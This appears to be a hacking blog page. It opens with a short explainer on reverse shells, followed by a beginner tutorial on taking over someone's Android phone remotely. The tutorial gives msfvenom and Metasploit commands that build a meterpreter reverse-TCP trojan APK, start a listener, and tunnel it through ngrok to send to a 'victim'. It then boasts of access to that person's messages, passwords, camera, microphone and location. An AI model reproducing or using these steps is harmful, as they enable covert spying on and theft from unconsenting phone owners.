Reverse Shells

Image
>  A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. A reverse shell (also called a connect-back shell) can also be the only way to gain remote shell access across a NAT or firewall. Let’s see how reverse shells work in practice and what you can do to prevent them. How a Reverse Shell Works To establish a typical remote shell, a machine controlled by the attacker connects to a remote network host and requests a shell session – this is called a bind shell. But what if the remote host is not directly accessible, for example, because it has no public IP or is protected by a firewall? In this situation, a reverse shell might be used, where the target machine initiates an outgoing connection to a listening network host,

MOBILE HACKING

Hack Smart Phone Using Kali(Remotely)



Earn free bitcoin
Hello Hackers,
This is my first post.
This is a tutorial explaining how to hack smart phones with kali.


STEP 1: OPEN KALI/PARROT:

# Open up your terminal and create a Trojan file (that can be named anything)
# It can be easily done by these commands:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST="ip" LPORT=4444 R> /root/Desktop/y2.apk

     

STEP 2: Open another terminal

# Open another terminal until the file is in process
# Load  metasploit console.

        $ service postgresql start
        $ msfconsole
It looks like:


 STEP 3: Set up listener

IT TAKES SOME TIME TO LOAD

# After it loads , now loads the multi-handler exploit, Now type:
  $ use multi/handler
Set up a reverse payload :
   $ set payload android/meterpreter/reverse_tcp
# Now set LHOST  :
   $ set lhost = "your ip address"
# Now set LPORT  :
   $ set lport = 4444
# Now exploit :
   $ exploit




NOW YOUR TROJAN IS READY , NOW YOU NEED TO PASS THIS FILE TO THE VICTIM'S PHONE:



STEP 4: PORT FORWARDING

# we use ngrok to create a secure tunnel.
  $ ./ngrok http 80


  • Now send the link to victim (on same network or over the network)


ADVANTAGE :

# Easily excess call details, sms, Passwords.
# Easily excess on camera,microphone.
# Easily can send messages to anyone over what's app,sms, Instagram or any social app.
# Easily excess over photos, Videos and Data .
# Can delete or add Data on Victim's phone .
# Current Location.

















Comments

Post a Comment

Popular posts from this blog

OTP Bypassing

Installing I2P Service

Setup Proxychains in Linux